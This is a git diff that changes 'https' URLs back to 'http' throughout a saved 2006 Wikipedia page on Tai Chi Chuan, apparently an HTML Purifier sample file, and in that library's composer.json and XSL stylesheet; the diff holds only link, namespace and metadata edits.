src="http://upload.wikimedia.org/wikipedia/en/thumb/d/d1/Yang_Ch%27eng-fu_circa_1918.jpg/180px-Yang_Ch%27eng-fu_circa_1918.jpg" alt="Yang Chengfu in a posture from the Tai Chi solo form known as Single Whip, circa 1918" width="180" height="255" longdesc="/wiki/Image:Yang_Ch%27eng-fu_circa_1918.jpg" /></a> <div class="thumbcaption"> <div class="magnify" style="float:right"><a href="/wiki/Image:Yang_Ch%27eng-fu_circa_1918.jpg" class="internal" title="Enlarge"><img src="/skins-1.5/common/images/magnify-clip.png" width="15" height="11" alt="Enlarge" /></a></div> <b><a href="/wiki/Yang_Chengfu" title="Yang Chengfu">Yang Chengfu</a> in a posture from the Tai Chi solo form known as <i>Single Whip</i>, circa <a href="/wiki/1918" title="1918">1918</a></b></div> @@ -78,7 +78,7 @@ </tr> <tr> <td><a href="/wiki/Traditional_Chinese" title="Traditional Chinese">Traditional Chinese</a></td> -<td><a href="https://en.wiktionary.org/wiki/%E5%A4%AA" class="extiw" title="wiktionary:?">?</a><a href="https://en.wiktionary.org/wiki/%E6%A5%B5" class="extiw" title="wiktionary:?">?</a><a href="https://en.wiktionary.org/wiki/%E6%8B%B3" class="extiw" title="wiktionary:?">?</a></td> +<td><a href="http://en.wiktionary.org/wiki/%E5%A4%AA" class="extiw" title="wiktionary:?">?</a><a href="http://en.wiktionary.org/wiki/%E6%A5%B5" class="extiw" title="wiktionary:?">?</a><a href="http://en.wiktionary.org/wiki/%E6%8B%B3" class="extiw" title="wiktionary:?">?</a></td> </tr> <tr> <td><a href="/wiki/Cantonese_%28linguistics%29" title="Cantonese (linguistics)">Cantonese</a></td> @@ -170,7 +170,7 @@ <h2>Training and techniques</h2> <div class="thumb tright"> -<div style="width:182px;"><a href="/wiki/Image:Yin_yang.svg" class="internal" title="The T'ai Chi Symbol or T'ai Chi T'u (Taijitu)"><img src="https://upload.wikimedia.org/wikipedia/commons/thumb/1/17/Yin_yang.svg/180px-Yin_yang.svg.png" alt="The T'ai Chi Symbol or T'ai Chi T'u (Taijitu)" width="180" height="180" longdesc="/wiki/Image:Yin_yang.svg" /></a> +<div style="width:182px;"><a href="/wiki/Image:Yin_yang.svg" class="internal" title="The T'ai Chi Symbol or T'ai Chi T'u (Taijitu)"><img src="http://upload.wikimedia.org/wikipedia/commons/thumb/1/17/Yin_yang.svg/180px-Yin_yang.svg.png" alt="The T'ai Chi Symbol or T'ai Chi T'u (Taijitu)" width="180" height="180" longdesc="/wiki/Image:Yin_yang.svg" /></a> <div class="thumbcaption"> <div class="magnify" style="float:right"><a href="/wiki/Image:Yin_yang.svg" class="internal" title="Enlarge"><img src="/skins-1.5/common/images/magnify-clip.png" width="15" height="11" alt="Enlarge" /></a></div> <b>The T'ai Chi Symbol or T'ai Chi T'u (Taijitu)</b></div> @@ -199,7 +199,7 @@ <dd>Avoid than intimidate."</dd> </dl> <div class="thumb tright"> -<div style="width:352px;"><a href="/wiki/Image:Martial_arts_-_Fragrant_Hills.JPG" class="internal" title="An outdoor Chen style class in Beijing"><img src="https://upload.wikimedia.org/wikipedia/commons/thumb/b/b6/Martial_arts_-_Fragrant_Hills.JPG/350px-Martial_arts_-_Fragrant_Hills.JPG" alt="An outdoor Chen style class in Beijing" width="350" height="233" longdesc="/wiki/Image:Martial_arts_-_Fragrant_Hills.JPG" /></a> +<div style="width:352px;"><a href="/wiki/Image:Martial_arts_-_Fragrant_Hills.JPG" class="internal" title="An outdoor Chen style class in Beijing"><img src="http://upload.wikimedia.org/wikipedia/commons/thumb/b/b6/Martial_arts_-_Fragrant_Hills.JPG/350px-Martial_arts_-_Fragrant_Hills.JPG" alt="An outdoor Chen style class in Beijing" width="350" height="233" longdesc="/wiki/Image:Martial_arts_-_Fragrant_Hills.JPG" /></a> <div class="thumbcaption"> <div class="magnify" style="float:right"><a href="/wiki/Image:Martial_arts_-_Fragrant_Hills.JPG" class="internal" title="Enlarge"><img src="/skins-1.5/common/images/magnify-clip.png" width="15" height="11" alt="Enlarge" /></a></div> An outdoor Chen style class in Beijing</div> @@ -313,7 +313,7 @@ from Yang Ch`eng-fu <p><a name="Modern_T.27ai_Chi" id="Modern_T.27ai_Chi"></a></p> <h2>Modern T'ai Chi</h2> <div class="thumb tright"> -<div style="width:352px;"><a href="/wiki/Image:Taichi_shanghai_bund_2005.jpg" class="internal" title="Yang style in Shanghai"><img src="https://upload.wikimedia.org/wikipedia/commons/thumb/9/9f/Taichi_shanghai_bund_2005.jpg/350px-Taichi_shanghai_bund_2005.jpg" alt="Yang style in Shanghai" width="350" height="263" longdesc="/wiki/Image:Taichi_shanghai_bund_2005.jpg" /></a> +<div style="width:352px;"><a href="/wiki/Image:Taichi_shanghai_bund_2005.jpg" class="internal" title="Yang style in Shanghai"><img src="http://upload.wikimedia.org/wikipedia/commons/thumb/9/9f/Taichi_shanghai_bund_2005.jpg/350px-Taichi_shanghai_bund_2005.jpg" alt="Yang style in Shanghai" width="350" height="263" longdesc="/wiki/Image:Taichi_shanghai_bund_2005.jpg" /></a> <div class="thumbcaption"> <div class="magnify" style="float:right"><a href="/wiki/Image:Taichi_shanghai_bund_2005.jpg" class="internal" title="Enlarge"><img src="/skins-1.5/common/images/magnify-clip.png" width="15" height="11" alt="Enlarge" /></a></div> Yang style in Shanghai</div> @@ -327,7 +327,7 @@ Yang style in Shanghai</div> <h3>Modern forms</h3> <div class="thumb tright"> -<div style="width:352px;"><a href="/wiki/Image:Tai_Chi_fans.jpg" class="internal" title="Women practicing non-martial T'ai Chi in Chinatown (New York City, New York, USA)."><img src="https://upload.wikimedia.org/wikipedia/en/thumb/a/ad/Tai_Chi_fans.jpg/350px-Tai_Chi_fans.jpg" alt="Women practicing non-martial T'ai Chi in Chinatown (New York City, New York, USA)." width="350" height="201" longdesc="/wiki/Image:Tai_Chi_fans.jpg" /></a> +<div style="width:352px;"><a href="/wiki/Image:Tai_Chi_fans.jpg" class="internal" title="Women practicing non-martial T'ai Chi in Chinatown (New York City, New York, USA)."><img src="http://upload.wikimedia.org/wikipedia/en/thumb/a/ad/Tai_Chi_fans.jpg/350px-Tai_Chi_fans.jpg" alt="Women practicing non-martial T'ai Chi in Chinatown (New York City, New York, USA)." width="350" height="201" longdesc="/wiki/Image:Tai_Chi_fans.jpg" /></a> <div class="thumbcaption"> <div class="magnify" style="float:right"><a href="/wiki/Image:Tai_Chi_fans.jpg" class="internal" title="Enlarge"><img src="/skins-1.5/common/images/magnify-clip.png" width="15" height="11" alt="Enlarge" /></a></div> Women practicing non-martial T'ai Chi in <a href="/wiki/Chinatown_%28Manhattan%29" title="Chinatown (Manhattan)">Chinatown</a> (<a href="/wiki/New_York_City" title="New York City">New York City</a>, <a href="/wiki/New_York" title="New York">New York</a>, <a href="/wiki/USA" title="USA">USA</a>).</div> @@ -345,24 +345,24 @@ Women practicing non-martial T'ai Chi in <a href="/wiki/Chinatown_%28Manhattan%2 <p>Researchers have found that long-term T'ai Chi practice had favorable effects on the promotion of balance control, flexibility and cardiovascular fitness and reduced the risk of falls in elders. The studies also reported reduced pain, stress and anxiety in healthy subjects. Other studies have indicated improved cardiovascular and respiratory function in healthy subjects as well as those who had undergone coronary artery bypass surgery. Patients also benefited from T'ai Chi who suffered from heart failure, high blood pressure, heart attacks, arthritis and multiple sclerosis.</p> <p>T'ai Chi has also been shown to reduce the symptoms of young Attention Deficit and Hyperactivity Disorder (<a href="/wiki/ADHD" title="ADHD">ADHD</a>) sufferers. T'ai Chi's gentle, low impact, movements surprisingly burn more calories than surfing and nearly as many as downhill skiing. T'ai Chi also boosts aspects of the immune system's function very significantly, and has been shown to reduce the incidence of anxiety, depression, and overall mood disturbance. (See research citations listed below.)</p> -<p>A pilot study has found evidence that T'ai Chi and related qigong helps reduce the severity of <a href="/wiki/Diabetes" title="Diabetes">diabetes</a>.<a href="https://www.abc.net.au/pm/content/2005/s1535304.htm" class="external autonumber" title="https://www.abc.net.au/pm/content/2005/s1535304.htm">[1]</a></p> +<p>A pilot study has found evidence that T'ai Chi and related qigong helps reduce the severity of <a href="/wiki/Diabetes" title="Diabetes">diabetes</a>.<a href="http://www.abc.net.au/pm/content/2005/s1535304.htm" class="external autonumber" title="http://www.abc.net.au/pm/content/2005/s1535304.htm">[1]</a></p> <div class="editsection" style="float:right;margin-left:5px;">[<a href="/w/index.php?title=Tai_Chi_Chuan&action=edit&section=9" title="Edit section: Citations to medical research">edit</a>]</div> <p><a name="Citations_to_medical_research" id="Citations_to_medical_research"></a></p> <h3>Citations to medical research</h3> <ul> -<li>Wolf SL, Sattin RW, Kutner M. Intense T'ai Chi exercise training and fall occurrences in older, transitionally frail adults: a randomized, controlled trial. J Am Geriatr Soc. 2003 Dec; 51(12): 1693-701. <a href="https://www.ncbi.nlm.nih.gov/entrez/query.fcgi?cmd=Retrieve&db=pubmed&dopt=Abstract&list_uids=14687346" class="external" title="https://www.ncbi.nlm.nih.gov/entrez/query.fcgi?cmd=Retrieve&db=pubmed&dopt=Abstract&list_uids=14687346">PMID 14687346</a></li> -<li>Wang C, Collet JP, Lau J. The effect of Tai Chi on health outcomes in patients with chronic conditions: a <a href="/wiki/Systematic_review" title="Systematic review">systematic review</a>. Arch Intern Med. 2004 Mar 8;164(5):493-501. <a href="https://www.ncbi.nlm.nih.gov/entrez/query.fcgi?cmd=Retrieve&db=pubmed&dopt=Abstract&list_uids=15006825" class="external" title="https://www.ncbi.nlm.nih.gov/entrez/query.fcgi?cmd=Retrieve&db=pubmed&dopt=Abstract&list_uids=15006825">PMID 15006825</a></li> +<li>Wolf SL, Sattin RW, Kutner M. Intense T'ai Chi exercise training and fall occurrences in older, transitionally frail adults: a randomized, controlled trial. J Am Geriatr Soc. 2003 Dec; 51(12): 1693-701. <a href="http://www.ncbi.nlm.nih.gov/entrez/query.fcgi?cmd=Retrieve&db=pubmed&dopt=Abstract&list_uids=14687346" class="external" title="http://www.ncbi.nlm.nih.gov/entrez/query.fcgi?cmd=Retrieve&db=pubmed&dopt=Abstract&list_uids=14687346">PMID 14687346</a></li> +<li>Wang C, Collet JP, Lau J. The effect of Tai Chi on health outcomes in patients with chronic conditions: a <a href="/wiki/Systematic_review" title="Systematic review">systematic review</a>. Arch Intern Med. 2004 Mar 8;164(5):493-501. <a href="http://www.ncbi.nlm.nih.gov/entrez/query.fcgi?cmd=Retrieve&db=pubmed&dopt=Abstract&list_uids=15006825" class="external" title="http://www.ncbi.nlm.nih.gov/entrez/query.fcgi?cmd=Retrieve&db=pubmed&dopt=Abstract&list_uids=15006825">PMID 15006825</a></li> -<li>Search a listing of articles relating to the FICSIT trials and T'ai Chi <a href="https://www.ncbi.nlm.nih.gov/entrez/query.fcgi?cmd=Select+from+History&db=pubmed&query_key=3" class="external autonumber" title="https://www.ncbi.nlm.nih.gov/entrez/query.fcgi?cmd=Select+from+History&db=pubmed&query_key=3">[2]</a></li> +<li>Search a listing of articles relating to the FICSIT trials and T'ai Chi <a href="http://www.ncbi.nlm.nih.gov/entrez/query.fcgi?cmd=Select+from+History&db=pubmed&query_key=3" class="external autonumber" title="http://www.ncbi.nlm.nih.gov/entrez/query.fcgi?cmd=Select+from+History&db=pubmed&query_key=3">[2]</a></li> <li>Hernandez-Reif, M., Field, T.M., & Thimas, E. (2001). Attention deficit hyperactivity disorder: benefits from Tai Chi. Journal of Bodywork & Movement Therapies, 5(2):120-3, 2001 Apr, 5(23 ref), 120-123</li> -<li>Calorie Burning Chart <a href="https://www.nutristrategy.com/activitylist3.htm" class="external autonumber" title="https://www.nutristrategy.com/activitylist3.htm">[3]</a></li> -<li>Tai Chi boosts T-Cell counts in immune system <a href="https://www.acupuncturetoday.com/archives2003/nov/11taichi.html" class="external autonumber" title="https://www.acupuncturetoday.com/archives2003/nov/11taichi.html">[4]</a></li> +<li>Calorie Burning Chart <a href="http://www.nutristrategy.com/activitylist3.htm" class="external autonumber" title="http://www.nutristrategy.com/activitylist3.htm">[3]</a></li> +<li>Tai Chi boosts T-Cell counts in immune system <a href="http://www.acupuncturetoday.com/archives2003/nov/11taichi.html" class="external autonumber" title="http://www.acupuncturetoday.com/archives2003/nov/11taichi.html">[4]</a></li> <li>Tai Chi, depression, anxiety, and mood disturbance (American Psychological Association) Journal of Psychosomatic Research, 1989 Vol 33 (2) 197-206</li> -<li>A comprehensive listing of Tai Chi medical research links <a href="https://www.worldtaichiday.org/WTCQDHlthBenft.html" class="external autonumber" title="https://www.worldtaichiday.org/WTCQDHlthBenft.html">[5]</a></li> -<li>References to medical publications <a href="https://www.worldtaichiday.org/HeadlineNews.html" class="external autonumber" title="https://www.worldtaichiday.org/HeadlineNews.html">[6]</a></li> -<li><a href="https://www.abc.net.au/pm/content/2005/s1535304.htm" class="external text" title="https://www.abc.net.au/pm/content/2005/s1535304.htm">Tai Chi a promising remedy for diabetes</a>, <i>Australian Broadcasting Corporation</i>, 20 December, 2005 - Pilot study of Qigong and tai chi in diabetes sufferers.</li> -<li>Health Research Articles on "Tai Chi as Health Therapy" for many issues, i.e. ADHD, Cardiac Health & Rehabilitation, Diabetes, High Blood Pressure, Menopause, Bone Loss, Weight Loss, etc.<a href="https://www.worldtaichiday.org/LIBRARYArticles/LIBRARYTaiChiArticlesMenu.html" class="external autonumber" title="https://www.worldtaichiday.org/LIBRARYArticles/LIBRARYTaiChiArticlesMenu.html">[7]</a></li> +<li>A comprehensive listing of Tai Chi medical research links <a href="http://www.worldtaichiday.org/WTCQDHlthBenft.html" class="external autonumber" title="http://www.worldtaichiday.org/WTCQDHlthBenft.html">[5]</a></li> +<li>References to medical publications <a href="http://www.worldtaichiday.org/HeadlineNews.html" class="external autonumber" title="http://www.worldtaichiday.org/HeadlineNews.html">[6]</a></li> +<li><a href="http://www.abc.net.au/pm/content/2005/s1535304.htm" class="external text" title="http://www.abc.net.au/pm/content/2005/s1535304.htm">Tai Chi a promising remedy for diabetes</a>, <i>Australian Broadcasting Corporation</i>, 20 December, 2005 - Pilot study of Qigong and tai chi in diabetes sufferers.</li> +<li>Health Research Articles on "Tai Chi as Health Therapy" for many issues, i.e. ADHD, Cardiac Health & Rehabilitation, Diabetes, High Blood Pressure, Menopause, Bone Loss, Weight Loss, etc.<a href="http://www.worldtaichiday.org/LIBRARYArticles/LIBRARYTaiChiArticlesMenu.html" class="external autonumber" title="http://www.worldtaichiday.org/LIBRARYArticles/LIBRARYTaiChiArticlesMenu.html">[7]</a></li> </ul> <div class="editsection" style="float:right;margin-left:5px;">[<a href="/w/index.php?title=Tai_Chi_Chuan&action=edit&section=10" title="Edit section: See also">edit</a>]</div> @@ -380,25 +380,25 @@ Women practicing non-martial T'ai Chi in <a href="/wiki/Chinatown_%28Manhattan%2 <p><a name="External_links" id="External_links"></a></p> <h2>External links</h2> <ul> -<li><a href="https://www.chenxiaowang.com/" class="external text" title="https://www.chenxiaowang.com/">A Chen Family Website</a></li> -<li><a href="https://www.yangfamilytaichi.com/" class="external text" title="https://www.yangfamilytaichi.com/">Yang Family Website</a></li> -<li><a href="https://www.wustyle.com/" class="external text" title="https://www.wustyle.com/">Wu Chien-ch'�an Family Website</a></li> -<li><a href="https://www.fushengyuan-taichi.com.au/" class="external text" title="https://www.fushengyuan-taichi.com.au/">Fu Family Website</a></li> +<li><a href="http://www.chenxiaowang.com/" class="external text" title="http://www.chenxiaowang.com/">A Chen Family Website</a></li> +<li><a href="http://www.yangfamilytaichi.com/" class="external text" title="http://www.yangfamilytaichi.com/">Yang Family Website</a></li> +<li><a href="http://www.wustyle.com/" class="external text" title="http://www.wustyle.com/">Wu Chien-ch'�an Family Website</a></li> +<li><a href="http://www.fushengyuan-taichi.com.au/" class="external text" title="http://www.fushengyuan-taichi.com.au/">Fu Family Website</a></li> -<li><a href="https://www.itcca.org/" class="external text" title="https://www.itcca.org/">Yang family disciple's website (ITCCA)</a></li> -<li><a href="https://www.dongtaichi.com/" class="external text" title="https://www.dongtaichi.com/">Dong T'ai Chi</a></li> -<li><a href="https://www.leefamilystyle.com/" class="external text" title="https://www.leefamilystyle.com/">UK website for Li style, popular in Europe</a></li> -<li><a href="https://www.chen-taiji.com/mambo/" class="external text" title="https://www.chen-taiji.com/mambo/">The World of Taijiquan</a></li> -<li><a href="https://www.scheele.org/lee/tcclinks.html" class="external text" title="https://www.scheele.org/lee/tcclinks.html">Lee Scheele's Links to T'ai Chi Ch'uan Web Sites</a></li> -<li><a href="https://news.bbc.co.uk/1/hi/health/3543907.stm" class="external text" title="https://news.bbc.co.uk/1/hi/health/3543907.stm">BBC article</a></li> -<li><a href="https://www.acupuncturetoday.com/archives2004/jul/07taichi.html" class="external text" title="https://www.acupuncturetoday.com/archives2004/jul/07taichi.html">Tai Chi: Good for the Mind, Good for the Body</a></li> -<li><a href="https://www.taichiunion.com/" class="external text" title="https://www.taichiunion.com/">Tai Chi Chuan Union for Great Britian: The largest collective of independent Tai Chi Chuan Instructors in the British Isles</a></li> +<li><a href="http://www.itcca.org/" class="external text" title="http://www.itcca.org/">Yang family disciple's website (ITCCA)</a></li> +<li><a href="http://www.dongtaichi.com/" class="external text" title="http://www.dongtaichi.com/">Dong T'ai Chi</a></li> +<li><a href="http://www.leefamilystyle.com/" class="external text" title="http://www.leefamilystyle.com/">UK website for Li style, popular in Europe</a></li> +<li><a href="http://www.chen-taiji.com/mambo/" class="external text" title="http://www.chen-taiji.com/mambo/">The World of Taijiquan</a></li> +<li><a href="http://www.scheele.org/lee/tcclinks.html" class="external text" title="http://www.scheele.org/lee/tcclinks.html">Lee Scheele's Links to T'ai Chi Ch'uan Web Sites</a></li> +<li><a href="http://news.bbc.co.uk/1/hi/health/3543907.stm" class="external text" title="http://news.bbc.co.uk/1/hi/health/3543907.stm">BBC article</a></li> +<li><a href="http://www.acupuncturetoday.com/archives2004/jul/07taichi.html" class="external text" title="http://www.acupuncturetoday.com/archives2004/jul/07taichi.html">Tai Chi: Good for the Mind, Good for the Body</a></li> +<li><a href="http://www.taichiunion.com/" class="external text" title="http://www.taichiunion.com/">Tai Chi Chuan Union for Great Britian: The largest collective of independent Tai Chi Chuan Instructors in the British Isles</a></li> </ul> <!-- Saved in parser cache with key enwiki:pcache:idhash:30690-0!0!0!1!!en!2 and timestamp 20060722121412 --> <div class="printfooter"> -Retrieved from "<a href="https://en.wikipedia.org/wiki/Tai_Chi_Chuan">https://en.wikipedia.org/wiki/Tai_Chi_Chuan</a>"</div> +Retrieved from "<a href="http://en.wikipedia.org/wiki/Tai_Chi_Chuan">http://en.wikipedia.org/wiki/Tai_Chi_Chuan</a>"</div> <div id="catlinks"><p class='catlinks'><a href="/w/index.php?title=Special:Categories&article=Tai_Chi_Chuan" title="Special:Categories">Categories</a>: <span dir='ltr'><a href="/wiki/Category:Chinese_martial_arts" title="Category:Chinese martial arts">Chinese martial arts</a></span> | <span dir='ltr'><a href="/wiki/Category:T%27ai_Chi_Ch%27uan" title="Category:T'ai Chi Ch'uan">T'ai Chi Ch'uan</a></span> | <span dir='ltr'><a href="/wiki/Category:Taoism" title="Category:Taoism">Taoism</a></span> | <span dir='ltr'><a href="/wiki/Category:Meditation" title="Category:Meditation">Meditation</a></span> | <span dir='ltr'><a href="/wiki/Category:Mind-body_interventions" title="Category:Mind-body interventions">Mind-body interventions</a></span> | <span dir='ltr'><a href="/wiki/Category:Traditional_Chinese_medicine" title="Category:Traditional Chinese medicine">Traditional Chinese medicine</a></span></p></div> <!-- end content --> <div class="visualClear"></div> @@ -454,7 +454,7 @@ Retrieved from "<a href="https://en.wikipedia.org/wiki/Tai_Chi_Chuan">https://en <li id="n-randompage"><a href="/wiki/Special:Random">Random article</a></li> <li id="n-help"><a href="/wiki/Help:Contents">Help</a></li> <li id="n-contact"><a href="/wiki/Wikipedia:Contact_us">Contact Wikipedia</a></li> - <li id="n-sitesupport"><a href="https://wikimediafoundation.org/wiki/Fundraising#Donation_methods">Donations</a></li> + <li id="n-sitesupport"><a href="http://wikimediafoundation.org/wiki/Fundraising#Donation_methods">Donations</a></li> </ul> </div> @@ -487,34 +487,34 @@ Retrieved from "<a href="https://en.wikipedia.org/wiki/Tai_Chi_Chuan">https://en <h5>In other languages</h5> <div class="pBody"> <ul> - <li class="interwiki-br"><a href="https://br.wikipedia.org/wiki/Taichichuan">Brezhoneg</a></li> - <li class="interwiki-ca"><a href="https://ca.wikipedia.org/wiki/Tai_txi_txuan">Catal�</a></li> + <li class="interwiki-br"><a href="http://br.wikipedia.org/wiki/Taichichuan">Brezhoneg</a></li> + <li class="interwiki-ca"><a href="http://ca.wikipedia.org/wiki/Tai_txi_txuan">Catal�</a></li> - <li class="interwiki-cs"><a href="https://cs.wikipedia.org/wiki/Tchaj-%C5%A5i">Cesky</a></li> - <li class="interwiki-da"><a href="https://da.wikipedia.org/wiki/Tai_Chi">Dansk</a></li> - <li class="interwiki-de"><a href="https://de.wikipedia.org/wiki/Taijiquan">Deutsch</a></li> - <li class="interwiki-et"><a href="https://et.wikipedia.org/wiki/Taijiquan">Eesti</a></li> - <li class="interwiki-el"><a href="https://el.wikipedia.org/wiki/%CE%A4%CE%AC%CE%B9_%CE%A4%CE%B6%CE%AF_%CE%A3%CE%BF%CF%85%CE%AC%CE%BD">????????</a></li> - <li class="interwiki-es"><a href="https://es.wikipedia.org/wiki/Tai_Chi_Chuan">Espa�ol</a></li> + <li class="interwiki-cs"><a href="http://cs.wikipedia.org/wiki/Tchaj-%C5%A5i">Cesky</a></li> + <li class="interwiki-da"><a href="http://da.wikipedia.org/wiki/Tai_Chi">Dansk</a></li> + <li class="interwiki-de"><a href="http://de.wikipedia.org/wiki/Taijiquan">Deutsch</a></li> + <li class="interwiki-et"><a href="http://et.wikipedia.org/wiki/Taijiquan">Eesti</a></li> + <li class="interwiki-el"><a href="http://el.wikipedia.org/wiki/%CE%A4%CE%AC%CE%B9_%CE%A4%CE%B6%CE%AF_%CE%A3%CE%BF%CF%85%CE%AC%CE%BD">????????</a></li> + <li class="interwiki-es"><a href="http://es.wikipedia.org/wiki/Tai_Chi_Chuan">Espa�ol</a></li> - <li class="interwiki-eo"><a href="https://eo.wikipedia.org/wiki/Taj%C4%9Di%C4%89uano">Esperanto</a></li> - <li class="interwiki-fr"><a href="https://fr.wikipedia.org/wiki/Tai-chi-chuan">Fran�ais</a></li> - <li class="interwiki-it"><a href="https://it.wikipedia.org/wiki/Taijiquan">Italiano</a></li> - <li class="interwiki-he"><a href="https://he.wikipedia.org/wiki/%D7%98%D7%90%D7%99_%D7%A6%27%D7%99">?????</a></li> - <li class="interwiki-hu"><a href="https://hu.wikipedia.org/wiki/Taijiquan">Magyar</a></li> - <li class="interwiki-nl"><a href="https://nl.wikipedia.org/wiki/Tai_Chi">Nederlands</a></li> + <li class="interwiki-eo"><a href="http://eo.wikipedia.org/wiki/Taj%C4%9Di%C4%89uano">Esperanto</a></li> + <li class="interwiki-fr"><a href="http://fr.wikipedia.org/wiki/Tai-chi-chuan">Fran�ais</a></li> + <li class="interwiki-it"><a href="http://it.wikipedia.org/wiki/Taijiquan">Italiano</a></li> + <li class="interwiki-he"><a href="http://he.wikipedia.org/wiki/%D7%98%D7%90%D7%99_%D7%A6%27%D7%99">?????</a></li> + <li class="interwiki-hu"><a href="http://hu.wikipedia.org/wiki/Taijiquan">Magyar</a></li> + <li class="interwiki-nl"><a href="http://nl.wikipedia.org/wiki/Tai_Chi">Nederlands</a></li> - <li class="interwiki-ja"><a href="https://ja.wikipedia.org/wiki/%E5%A4%AA%E6%A5%B5%E6%8B%B3">???</a></li> - <li class="interwiki-pl"><a href="https://pl.wikipedia.org/wiki/Taijiquan">Polski</a></li> - <li class="interwiki-pt"><a href="https://pt.wikipedia.org/wiki/Tai_Chi_Chuan">Portugu�s</a></li> - <li class="interwiki-ro"><a href="https://ro.wikipedia.org/wiki/Taijiquan">Rom�na</a></li> - <li class="interwiki-ru"><a href="https://ru.wikipedia.org/wiki/%D0%A2%D0%B0%D0%B9%D1%86%D0%B7%D0%B8%D1%86%D1%8E%D0%B0%D0%BD%D1%8C">???????</a></li> - <li class="interwiki-fi"><a href="https://fi.wikipedia.org/wiki/Taijiquan">Suomi</a></li> + <li class="interwiki-ja"><a href="http://ja.wikipedia.org/wiki/%E5%A4%AA%E6%A5%B5%E6%8B%B3">???</a></li> + <li class="interwiki-pl"><a href="http://pl.wikipedia.org/wiki/Taijiquan">Polski</a></li> + <li class="interwiki-pt"><a href="http://pt.wikipedia.org/wiki/Tai_Chi_Chuan">Portugu�s</a></li> + <li class="interwiki-ro"><a href="http://ro.wikipedia.org/wiki/Taijiquan">Rom�na</a></li> + <li class="interwiki-ru"><a href="http://ru.wikipedia.org/wiki/%D0%A2%D0%B0%D0%B9%D1%86%D0%B7%D0%B8%D1%86%D1%8E%D0%B0%D0%BD%D1%8C">???????</a></li> + <li class="interwiki-fi"><a href="http://fi.wikipedia.org/wiki/Taijiquan">Suomi</a></li> - <li class="interwiki-sv"><a href="https://sv.wikipedia.org/wiki/Taijiquan">Svenska</a></li> - <li class="interwiki-th"><a href="https://th.wikipedia.org/wiki/%E0%B9%84%E0%B8%97%E0%B9%88%E0%B9%80%E0%B8%81%E0%B9%8A%E0%B8%81">???</a></li> - <li class="interwiki-tr"><a href="https://tr.wikipedia.org/wiki/Tai-Chi_Chuan">T�rk�e</a></li> - <li class="interwiki-zh"><a href="https://zh.wikipedia.org/wiki/%E5%A4%AA%E6%9E%81%E6%8B%B3">??</a></li> + <li class="interwiki-sv"><a href="http://sv.wikipedia.org/wiki/Taijiquan">Svenska</a></li> + <li class="interwiki-th"><a href="http://th.wikipedia.org/wiki/%E0%B9%84%E0%B8%97%E0%B9%88%E0%B9%80%E0%B8%81%E0%B9%8A%E0%B8%81">???</a></li> + <li class="interwiki-tr"><a href="http://tr.wikipedia.org/wiki/Tai-Chi_Chuan">T�rk�e</a></li> + <li class="interwiki-zh"><a href="http://zh.wikipedia.org/wiki/%E5%A4%AA%E6%9E%81%E6%8B%B3">??</a></li> </ul> </div> </div> @@ -522,13 +522,13 @@ Retrieved from "<a href="https://en.wikipedia.org/wiki/Tai_Chi_Chuan">https://en </div><!-- end of the left (by default at least) column --> <div class="visualClear"></div> <div id="footer"> - <div id="f-poweredbyico"><a href="https://www.mediawiki.org/"><img src="/skins-1.5/common/images/poweredby_mediawiki_88x31.png" alt="MediaWiki" /></a></div> - <div id="f-copyrightico"><a href="https://wikimediafoundation.org/"><img src="/images/wikimedia-button.png" border="0" alt="Wikimedia Foundation"/></a></div> + <div id="f-poweredbyico"><a href="http://www.mediawiki.org/"><img src="/skins-1.5/common/images/poweredby_mediawiki_88x31.png" alt="MediaWiki" /></a></div> + <div id="f-copyrightico"><a href="http://wikimediafoundation.org/"><img src="/images/wikimedia-button.png" border="0" alt="Wikimedia Foundation"/></a></div> <ul id="f-list"> <li id="lastmod"> This page was last modified 03:15, July 22, 2006.</li> <li id="copyright">All text is available under the terms of the <a class='internal' href="/wiki/Wikipedia:Text_of_the_GNU_Free_Documentation_License" title="Wikipedia:Text of the GNU Free Documentation License">GNU Free Documentation License</a>. (See <b><a class='internal' href="/wiki/Wikipedia:Copyrights" title="Wikipedia:Copyrights">Copyrights</a></b> for details.) <br /> Wikipedia® is a registered trademark of the Wikimedia Foundation, Inc.<br /></li> - <li id="privacy"><a href="https://wikimediafoundation.org/wiki/Privacy_policy" title="wikimedia:Privacy policy">Privacy policy</a></li> + <li id="privacy"><a href="http://wikimediafoundation.org/wiki/Privacy_policy" title="wikimedia:Privacy policy">Privacy policy</a></li> <li id="about"><a href="/wiki/Wikipedia:About" title="Wikipedia:About">About Wikipedia</a></li> <li id="disclaimer"><a href="/wiki/Wikipedia:General_disclaimer" title="Wikipedia:General disclaimer">Disclaimers</a></li> </ul> diff --git a/htmlpurifier-4.10.0/composer.json b/htmlpurifier-4.10.0/composer.json index d849e3f..76ed89d 100755 --- a/htmlpurifier-4.10.0/composer.json +++ b/htmlpurifier-4.10.0/composer.json @@ -3,13 +3,13 @@ "description": "Standards compliant HTML filter written in PHP", "type": "library", "keywords": ["html"], - "homepage": "https://htmlpurifier.org/", + "homepage": "http://htmlpurifier.org/", "license": "LGPL", "authors": [ { "name": "Edward Z. Yang", "email": "admin@htmlpurifier.org", - "homepage": "https://ezyang.com" + "homepage": "http://ezyang.com" } ], "require": { diff --git a/htmlpurifier-4.10.0/configdoc/styles/plain.xsl b/htmlpurifier-4.10.0/configdoc/styles/plain.xsl index 599ebad..55e157f 100755 --- a/htmlpurifier-4.10.0/configdoc/styles/plain.xsl +++ b/htmlpurifier-4.10.0/configdoc/styles/plain.xsl @@ -1,14 +1,14 @@ <?xml version="1.0" encoding="UTF-8"?> <xsl:stylesheet version = "1.0" - xmlns = "https://www.w3.org/1999/xhtml" - xmlns:xsl = "https://www.w3.org/1999/XSL/Transform" + xmlns = "http://www.w3.org/1999/xhtml" + xmlns:xsl = "http://www.w3.org/1999/XSL/Transform" > <xsl:output method = "xml" encoding = "UTF-8" doctype-public = "-//W3C//DTD XHTML 1.0 Transitional//EN" - doctype-system = "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" + doctype-system = "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" indent = "no" media-type = "text/html" /> @@ -55,7 +55,7 @@ <xsl:attribute name="id">type-<xsl:value-of select="@id" /></xsl:attribute> <h3><code><xsl:value-of select="@id" /></code>: <xsl:value-of select="@name" /></h3> <div class="type-description"> - <xsl:copy-of xmlns:xhtml="https://www.w3.org/1999/xhtml" select="xhtml:div/node()" /> + <xsl:copy-of xmlns:xhtml="http://www.w3.org/1999/xhtml" select="xhtml:div/node()" /> </div> </div> </xsl:template> @@ -113,7 +113,7 @@ </xsl:template> <xsl:template match="namespace/description"> <div 